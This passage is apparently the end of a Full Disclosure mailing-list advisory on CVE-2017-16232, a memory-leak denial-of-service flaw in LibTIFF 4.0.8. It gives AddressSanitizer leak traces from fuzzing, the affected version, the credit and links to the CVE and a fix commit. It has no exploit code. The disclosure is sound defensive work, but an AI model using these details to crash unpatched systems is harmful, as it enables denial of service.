> #1 0x54d6b6 in TIFFClientOpen 
> /home/zzt/Fuzzing/Victims/tiff-4.0.8/libtiff/tif_open.c:119
> 
> Indirect leak of 81904 byte(s) in 1 object(s) allocated from:
> #0 0x4bbfd3 in __interceptor_malloc 
> /home/brian/final/llvm.src/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:67:3
> #1 0x5ea2e9 in LZWSetupDecode 
> /home/zzt/Fuzzing/Victims/tiff-4.0.8/libtiff/tif_lzw.c:232
> 
> Indirect leak of 2273 byte(s) in 5 object(s) allocated from:
> #0 0x4bc3d7 in realloc 
> /home/brian/final/llvm.src/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:98:3
> #1 0x56f5db in _TIFFCheckRealloc 
> /home/zzt/Fuzzing/Victims/tiff-4.0.8/libtiff/tif_aux.c:73
> #2 0x56f5db in _TIFFCheckMalloc 
> /home/zzt/Fuzzing/Victims/tiff-4.0.8/libtiff/tif_aux.c:88
> 
> Indirect leak of 1240 byte(s) in 2 object(s) allocated from:
> #0 0x4bc3d7 in realloc 
> /home/brian/final/llvm.src/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:98:3
> #1 0x56f430 in _TIFFCheckRealloc 
> /home/zzt/Fuzzing/Victims/tiff-4.0.8/libtiff/tif_aux.c:73

## Versions:LibTIFF 4.0.8
## Impact:Denial of Service
## Credit
This vulnerability was discovered by Jiawang Zhang Coordination Center of China 
(CNCERT/CC)
## References
CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16232
https://github.com/shelltdf/libtiff/commit/25f9ffa56548c1846c4a1f19308b7f561f7b1ab0

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/